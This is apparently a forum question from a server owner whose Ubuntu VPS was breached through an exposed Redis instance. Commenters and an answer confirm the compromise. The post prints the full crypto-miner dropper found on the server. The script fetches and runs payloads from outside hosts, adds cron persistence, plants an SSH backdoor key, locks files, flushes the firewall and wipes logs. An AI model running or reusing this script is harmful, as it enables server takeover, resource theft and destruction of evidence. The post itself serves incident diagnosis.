# My production Ubuntu server was breached through Redis and I found this script. Is it a decoy?

Tags: malware, linux

A few days ago my VPS came under heavy load from spammers trying ssh attacks and script injections. I have since added new fail2ban regexps and new security measures for REDIS where it looks like they were able to enter from. I found this entry in my redis and root users' crontab.

```
*/1 * * * * cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh
```

Had there been an "l" at the end of curl, that would have been the end of my server. I (carefully) downloaded and inspected the script and it would have run this apparent crypto miner

```
setenforce 0 2>dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
sync && echo 3 >/proc/sys/vm/drop_caches
crondir='/var/spool/cron/'"$USER"
cont=`cat ${crondir}`
ssht=`cat /root/.ssh/authorized_keys`
echo 1 > /etc/sysupdates
rtdir="/etc/sysupdates"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/cur"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/wge"
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/xget /usr/bin/get
mv /usr/bin/get /usr/bin/wge
mv /usr/bin/curl /usr/bin/url
mv /usr/bin/xurl /usr/bin/url
mv /usr/bin/url /usr/bin/cur
miner_url="https://de.gsearch.com.de/api/sysupdate"
miner_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/sysupdate"
miner_size="854364"
sh_url="https://de.gsearch.com.de/api/update.sh"
sh_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/update.sh"
config_url="https://de.gsearch.com.de/api/config.json"
config_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/config.json"
config_size="4954"
scan_url="https://de.gsearch.com.de/api/networkservice"
scan_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/networkservice"
scan_size="2584072"
watchdog_url="https://de.gsearch.com.de/api/sysguard"
watchdog_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/sysguard"
watchdog_size="1929480"

kill_miner_proc()
{
    ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "pool.t00ls.ru"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
    ps auxf|grep xiaoyao| awk '{print $2}'|xargs kill -9
    ps auxf|grep xiaoxue| awk '{print $2}'|xargs kill -9
    ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9
    ps ax|grep -o './[0-9]* -c'| xargs pkill -f
    pkill -f biosetjenkins
    pkill -f Loopback
    pkill -f apaceha
    pkill -f cryptonight
    pkill -f stratum
    pkill -f mixnerdx
    pkill -f performedl
    pkill -f JnKihGjn
    pkill -f irqba2anc1
    pkill -f irqba5xnc1
    pkill -f irqbnc1
    pkill -f ir29xc1
    pkill -f conns
    pkill -f irqbalance
    pkill -f crypto-pool
    pkill -f minexmr
    pkill -f XJnRj
    pkill -f mgwsl
    pkill -f pythno
    pkill -f jweri
    pkill -f lx26
    pkill -f NXLAi
    pkill -f BI5zj
    pkill -f askdljlqw
    pkill -f minerd
    pkill -f minergate
    pkill -f Guard.sh
    pkill -f ysaydh
    pkill -f bonns
    pkill -f donns
    pkill -f kxjd
    pkill -f Duck.sh
    pkill -f bonn.sh
    pkill -f conn.sh
    pkill -f kworker34
    pkill -f kw.sh
    pkill -f pro.sh
    pkill -f polkitd
    pkill -f acpid
    pkill -f icb5o
    pkill -f nopxi
    pkill -f irqbalanc1
    pkill -f minerd
    pkill -f i586
    pkill -f gddr
    pkill -f mstxmr
    pkill -f ddg.2011
    pkill -f wnTKYg
    pkill -f deamon
    pkill -f disk_genius
    pkill -f sourplum
    pkill -f polkitd
    pkill -f nanoWatch
    pkill -f zigw
    pkill -f devtool
    pkill -f systemctI
    pkill -f WmiPrwSe
        pkill -f sysguard
            pkill -f sysupdate
                pkill -f networkservice
    crontab -r
    rm -rf /var/spool/cron/*
}
downloads()
{
    if [ -f "/usr/bin/curl" ]
    then 
    echo $1,$2
        http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1`
        if [ "$http_code" -eq "200" ]
        then
            curl --connect-timeout 10 --retry 100 $1 > $2
        elif [ "$http_code" -eq "405" ]
        then
            curl --connect-timeout 10 --retry 100 $1 > $2
        else
            curl --connect-timeout 10 --retry 100 $3 > $2
        fi
    elif [ -f "/usr/bin/cur" ]
    then
        http_code = `cur -I -m 10 -o /dev/null -s -w %{http_code} $1`
        if [ "$http_code" -eq "200" ]
        then
            cur --connect-timeout 10 --retry 100 $1 > $2
        elif [ "$http_code" -eq "405" ]
        then
            cur --connect-timeout 10 --retry 100 $1 > $2
        else
            cur --connect-timeout 10 --retry 100 $3 > $2
        fi
    elif [ -f "/usr/bin/wget" ]
    then
        wget --timeout=10 --tries=100 -O $2 $1
        if [ $? -ne 0 ]
    then
        wget --timeout=10 --tries=100 -O $2 $3
        fi
    elif [ -f "/usr/bin/wge" ]
    then
        wge --timeout=10 --tries=100 -O $2 $1
        if [ $? -eq 0 ]
        then
            wge --timeout=10 --tries=100 -O $2 $3
        fi
    fi
}

kill_sus_proc()
{
    ps axf -o "pid"|while read procid
    do
            ls -l /proc/$procid/exe | grep /tmp
            if [ $? -ne 1 ]
            then
                    cat /proc/$procid/cmdline| grep -a -E "sysguard|update.sh|sysupdate|networkservice"
                    if [ $? -ne 0 ]
                    then
                            kill -9 $procid
                    else
                            echo "don't kill"
                    fi
            fi
    done
    ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid
    do
            cat /proc/$procid/cmdline| grep -a -E "sysguard|update.sh|sysupdate|networkservice"
            if [ $? -ne 0 ]
            then
                    kill -9 $procid
            else
                    echo "don't kill"
            fi
    done
}

kill_miner_proc
kill_sus_proc

if [ -f "$rtdir" ]
then
        echo "i am root"
        echo "goto 1" >> /etc/sysupdate
        chattr -i /etc/sysupdate*
        chattr -i /etc/config.json*
        chattr -i /etc/update.sh*
        chattr -i /root/.ssh/authorized_keys*
        chattr -i /etc/networkservice
    if [ ! -f "/usr/bin/crontab" ]
        then 
            echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1" >> ${crondir}
        else
            [[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab -
    fi
        chmod 700 /root/.ssh/
        echo >> /root/.ssh/authorized_keys
        chmod 600 root/.ssh/authorized_keys
        echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/oeXUWDNW1MrWiQNvKeSeSSdZ6NaYVqfSJgXUSgiQbktTo8Fhv43R9FWDvVhSrwPoFBz9SAfgO06jc0M2kGVNS9J2sLJdUB9u1KxY5IOzqG4QTgZ6LP2UUWLG7TGMpkbK7z6G8HAZx7u3l5+Vc82dKtI0zb/ohYSBb7pK/2QFeVa22L+4IDrEXmlv3mOvyH5DwCh3HcHjtDPrAhFqGVyFZBsRZbQVlrPfsxXH2bOLc1PMrK1oG8dyk8gY8m4iZfr9ZDGxs4gAqdWtBQNIN8cvz4SI+Jv9fvayMH7f+Kl2yXiHN5oD9BVTkdIWX root@u17" >> /root/.ssh/authorized_keys


        cfg="/etc/config.json"
        file="/etc/sysupdate"

    if [-f "/etc/config.json" ]
    then
        filesize_config=`ls -l /etc/config.json | awk '{ print $5 }'`
        if [ "$filesize_config" -ne "$config_size" ]    
        then
            pkill -f sysupdate
            rm /etc/config.json
            downloads $config_url /etc/config.json $config_url_backup
        else
            echo "no need download"
        fi
    else
        downloads $config_url /etc/config.json $config_url_backup
    fi

    if [ -f "/etc/sysupdate" ]
    then
            filesize1=`ls -l /etc/sysupdate | awk '{ print $5 }'`
            if [ "$filesize1" -ne "$miner_size" ] 
            then
                pkill -f sysupdate
                rm /etc/sysupdate
                downloads $miner_url /etc/sysupdate $miner_url_backup
            else
                echo "not need download"
            fi
    else
            downloads $miner_url /etc/sysupdate $miner_url_backup
    fi

    if [ -f "/etc/sysguard" ]
    then
            filesize1=`ls -l /etc/sysguard | awk '{ print $5 }'`
            if [ "$filesize1" -ne "$watchdog_size" ] 
            then
                pkill -f sysguard
                rm /etc/sysguard
                downloads $watchdog_url /etc/sysguard $watchdog_url_backup
            else
                echo "not need download"
            fi
    else
            downloads $watchdog_url /etc/sysguard $watchdog_url_backup
    fi

    downloads $sh_url /etc/update.sh $sh_url_backup

    if [ -f "/etc/networkservice" ]
    then
            filesize2=`ls -l /etc/networkservice | awk '{ print $5 }'`
            if [ "$filesize2" -ne "$scan_size" ] 
            then
                pkill -f networkservice
                rm /etc/networkservice
                downloads  $scan_url /etc/networkservice $scan_url_backup
            else
                echo "not need download"
            fi
    else
            downloads $scan_url /etc/networkservice $scan_url_backup
    fi

    chmod 777 /etc/sysupdate
    ps -fe|grep sysupdate |grep -v grep
    if [ $? -ne 0 ]
    then
                cd /etc
                echo "not root runing"
                sleep 5s
                ./sysupdate &
    else
                echo "root runing....."
    fi
    chmod 777 /etc/networkservice
    ps -fe|grep networkservice |grep -v grep
    if [ $? -ne 0 ]
    then
                cd /etc
                echo "not roots runing"
                sleep 5s
                ./networkservice &
    else
                echo "roots runing....."
    fi
    chmod 777 /etc/sysguard
    ps -fe|grep sysguard |grep -v grep
        if [ $? -ne 0 ]
            then
                echo "not tmps runing"
                cd /etc
                chmod 777 sysguard
                sleep 5s
                ./sysguard &
            else
                echo "roots runing....."
        fi


    chmod 777 /etc/sysupdate
    chattr +i /etc/sysupdate
    chmod 777 /etc/networkservice
    chattr +i /etc/networkservice
    chmod 777 /etc/config.json
    chattr +i /etc/config.json
    chmod 777 /etc/update.sh
    chattr +i /etc/update.sh
    chmod 777 /root/.ssh/authorized_keys
    chattr +i /root/.ssh/authorized_keys
else
    echo "goto 1" > /tmp/sysupdates
    chattr -i /tmp/sysupdate*
    chattr -i /tmp/networkservice
    chattr -i /tmp/config.json*
    chattr -i /tmp/update.sh*

    if [ ! -f "/usr/bin/crontab" ]
    then 
            echo "*/30 * * * * sh /tmp/update.sh >/dev/null 2>&1" >> ${crondir}
    else
            [[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /tmp/update.sh >/dev/null 2>&1") | crontab -
    fi

    if [ -f "/tmp/config.json" ]
    then
        filesize1=`ls -l /tmp/config.json | awk '{ print $5 }'`
        if [ "$filesize1" -ne "$config_size" ]
        then
            pkill -f sysupdate
            rm /tmp/config.json
            downloads  $config_url /tmp/config.json $config_url_backup
        else
            echo "no need download"
        fi
    else
        downloads $config_url /tmp/config.json $config_url_backup
    fi

    if [ -f "/tmp/sysupdate" ]
    then    
        filesize1=`ls -l /tmp/sysupdate | awk '{ print $5 }'`
        if [ "$filesize1" -ne "$miner_size" ] 
        then
                pkill -f sysupdate
                rm /tmp/sysupdate
                downloads $miner_url /tmp/sysupdate $miner_url_backup
        else
                echo "no need download"
        fi
    else
            downloads $miner_url /tmp/sysupdate $miner_url_backup
    fi

    if [ -f "/tmp/sysguard" ]
    then
            filesize1=`ls -l /tmp/sysguard | awk '{ print $5 }'`
            if [ "$filesize1" -ne "$watchdog_size" ] 
            then
                pkill -f sysguard
                rm /tmp/sysguard
                downloads $watchdog_url /tmp/sysguard $watchdog_url_backup
            else
                echo "not need download"
            fi
    else
            downloads $watchdog_url /tmp/sysguard $watchdog_url_backup
    fi

    echo "i am here"
    downloads $sh_url /tmp/update.sh $sh_url_backup

    if [ -f "/tmp/networkservice" ]
    then 
        filesize2=`ls -l /tmp/networkservice | awk '{ print $5 }'`
        if [ "$filesize2" -ne "$scan_size" ]  
        then
                pkill -f networkservice
                rm /tmp/networkservice
                downloads $scan_url /tmp/networkservice $scan_url_backup
        else
                echo "no need download"
        fi
    else
            downloads $scan_url /tmp/networkservice $scan_url_backup
    fi

    ps -fe|grep sysupdate |grep -v grep
        if [ $? -ne 0 ]
            then
                echo "not tmp runing"
                cd /tmp
                chmod 777 sysupdate
                sleep 5s
                ./sysupdate &
            else
                echo "tmp runing....."
        fi
    ps -fe|grep networkservice |grep -v grep
        if [ $? -ne 0 ]
            then
                echo "not tmps runing"
                cd /tmp
                chmod 777 networkservice
                sleep 5s
                ./networkservice &
            else
                echo "tmps runing....."
        fi

    ps -fe|grep sysguard |grep -v grep
        if [ $? -ne 0 ]
            then
                echo "not tmps runing"
                cd /tmp
                chmod 777 sysguard
                sleep 5s
                ./sysguard &
            else
                echo "tmps runing....."
        fi

    chmod 777 /tmp/sysupdate
    chattr +i /tmp/sysupdate
    chmod 777 /tmp/networkservice
    chattr +i /tmp/networkservice
    chmod 777 /tmp/sysguard
    chattr +i /tmp/sysguard
    chmod 777 /tmp/update.sh
    chattr +i /tmp/update.sh
    chmod 777 /tmp/config.json
    chattr +i /tmp/config.json

fi
iptables -F
iptables -X
iptables -A OUTPUT -p tcp --dport 3333 -j DROP
iptables -A OUTPUT -p tcp --dport 5555 -j DROP
iptables -A OUTPUT -p tcp --dport 7777 -j DROP
iptables -A OUTPUT -p tcp --dport 9999 -j DROP
iptables -I INPUT -s 43.245.222.57 -j DROP
service iptables reload
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
history -c
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
echo > /root/.bash_history
```

My question is, why is there no "l" in curl?  Is this a decoy and I still have malicious software somewhere in my server? Is it white hats just telling me they found an exploit? Did some anti malware floating around in cyberspace change the malicious script?

Comment: The script _creates_ /usr/bin/cur - you are definitely already compromised.

Comment: You found changes to your server (in this case added cron entries).  That means your server has been owned.  Nuke it from orbit and start over with properly-secured redis instances.  Sure, you might be able to manually scrub the malware, but you never know if there might be a backdoor installed somewhere...

Answer (score 2):

The "l" strip part is just to check whether the system is infected yet. The exploit came from server misconfiguration by exposing redis public with no-auth. Find more information here: https://blog.cystack.net/pwn-a-bunch-of-servers-via-a-redis-misconfiguration-and-the-shodan-search-engine/